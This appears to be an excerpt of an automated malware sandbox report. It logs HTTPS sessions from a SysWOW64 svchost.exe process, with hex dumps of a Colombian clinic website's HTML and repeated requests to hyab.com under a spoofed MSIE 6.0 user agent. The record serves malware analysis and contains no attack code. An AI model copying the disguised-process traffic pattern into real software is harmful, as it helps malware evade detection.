2023-03-22 04:45:22 UTC	779	IN	Data Raw: 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 56 Data Ascii: s</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-content"><span class="g-menu-item-title">V
2023-03-22 04:45:22 UTC	781	IN	Data Raw: 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 Data Ascii: le">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class="g
2023-03-22 04:45:22 UTC	782	IN	Data Raw: 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 Data Ascii: s-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul></div></div></li></ul></li><li c
2023-03-22 04:45:22 UTC	783	IN	Data Raw: 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 39 20 20 22 3e Data Ascii: <a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-399 ">
2023-03-22 04:45:22 UTC	785	IN	Data Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d Data Ascii: menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item
2023-03-22 04:45:22 UTC	786	IN	Data Raw: 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 38 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d Data Ascii: ntacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-menu-item-388 g-standard "><a class="g-m
2023-03-22 04:45:22 UTC	787	IN	Data Raw: 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 2a 2f 0d 0a 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 2f 2a 70 6f 70 75 70 20 Data Ascii: portant;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/popup background color/color: rgba(0, 0, 0, 0);/*popup
2023-03-22 04:45:22 UTC	789	IN	Data Raw: 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 22 3e 3c 2f 64 69 76 3e 27 2c 0d 0a 09 09 09 09 77 72 61 70 20 20 20 20 20 3a 20 27 3c 64 69 Data Ascii: peed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-overlay379"></div>',wrap : '<di
2023-03-22 04:45:22 UTC	790	IN	Data Raw: 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 Data Ascii: pt><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img style="display: block; margin-left: auto;
2023-03-22 04:45:22 UTC	791	IN	Data Raw: 32 66 66 36 0d 0a 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b Data Ascii: 2ff6 </div></div> </div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock
2023-03-22 04:45:22 UTC	793	IN	Data Raw: 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 73 74 6f 6d 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 Data Ascii: 0 nopaddingall"><div class="g-content"><div class="platform-content"><div class="moduletable g-animatedblock hidden-phone"><div class="customg-animatedblock hidden-phone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></di
2023-03-22 04:45:22 UTC	794	IN	Data Raw: 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 61 70 6f 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 Data Ascii: etable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/apoyo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoi
2023-03-22 04:45:22 UTC	795	IN	Data Raw: 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 76 61 63 75 6e 61 63 69 6f 6e 22 3e 56 61 63 75 6e 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 Data Ascii: aption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/vacunacion">Vacunacin</a></div> </div></figure></div> </div></div></div><div class="g-block size
2023-03-22 04:45:22 UTC	797	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 75 74 69 6c 69 74 79 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 Data Ascii: iv class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-utility"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="space
2023-03-22 04:45:22 UTC	798	IN	Data Raw: 2d 74 65 78 74 70 72 6f 6d 6f 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 63 33 61 30 61 63 61 65 62 36 61 64 61 61 61 30 61 32 61 30 61 61 61 63 61 64 61 36 62 30 38 33 61 30 61 66 61 61 61 64 61 61 61 30 61 32 62 30 61 32 61 64 61 66 62 36 61 61 62 30 65 64 61 30 61 63 61 65 65 64 61 30 61 63 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 Data Ascii: -textpromo"><p><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c3a0acaeb6adaaa0a2a0aaacada6b083a0afaaadaaa0a2b0a2adafb6aab0eda0acaeeda0ac">[email protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Op
2023-03-22 04:45:22 UTC	799	IN	Data Raw: 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 20 74 69 74 6c 65 31 20 66 70 2d 66 6f 6f 74 73 69 64 65 2d 62 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 68 33 20 63 6c 61 73 73 3d 22 67 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 Data Ascii: </div></div></div></div><div class="g-grid"><div class="g-block size-50 title1 fp-footside-b"><div class="g-content"><div class="moduletable "><h3 class="g-title">Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-ite
2023-03-22 04:45:22 UTC	801	IN	Data Raw: 74 61 63 74 2d 6c 61 62 65 6c 22 3e 44 6f 6d 69 6e 67 6f 73 20 79 20 66 65 73 74 69 76 6f 73 20 64 65 20 39 3a 30 30 20 e2 80 93 20 36 3a 30 30 20 70 2e 6d 2e 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 44 6f 6d 69 6e 67 6f 73 20 79 20 66 65 73 74 69 76 6f 73 20 64 65 20 39 3a 30 30 20 61 2e 6d 2e 20 e2 80 93 20 36 3a 30 30 20 70 2e 6d 2e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 Data Ascii: tact-label">Domingos y festivos de 9:00 6:00 p.m.</div> <div class="g-contact-text">Domingos y festivos de 9:00 a.m. 6:00 p.m.</div> </div></div> </div></div></div></div></section></div></div></div></section><section id="g-copyright"><d
2023-03-22 04:45:22 UTC	802	IN	Data Raw: 73 74 61 67 72 61 6d 20 66 61 2d 66 77 20 66 61 2d 32 78 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 6f 63 69 61 6c 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 Data Ascii: stagram fa-fw fa-2x"></span><span class="g-social-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javas
2023-03-22 04:45:22 UTC	803	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	62536	104.21.65.224	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	563	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.com
2023-03-22 04:45:07 UTC	677	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Set-Cookie: PHPSESSID=277d6fd9f47e2bf4a58e04d11763e53f; path=/ Location: https://hyabmagneter.se CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4g8N6PyVCPwJK5Soor52uMzV2b2i9KkIoW9vcm%2FVS%2Fx7o1P6YPqoJZVNZxJrvWfJu5FzkJdKyvuwuzjlaiIu4BfLwC%2BcknIqXkXXma0Nqu9TYL%2FcYz6GHBAq%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc887694b9a35-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:07 UTC	678	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	62544	104.21.65.224	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:07 UTC	563	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.com
2023-03-22 04:45:07 UTC	702	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Set-Cookie: PHPSESSID=ef61ab504b9dbb7f78fc574d51138dbf; path=/ Location: https://hyabmagneter.se CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CnaGgjrVYyPjc6ic044BVGHTiI4sQaFR8Lgw5VRdRV7GsnZ%2FHKuh7AcceZXJOX1wbEMcUmpEFY2TsZ8hhsuJRoYlceTKpI0pRlRpOBMJ%2Fxkpc8IyI52ib26eAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: 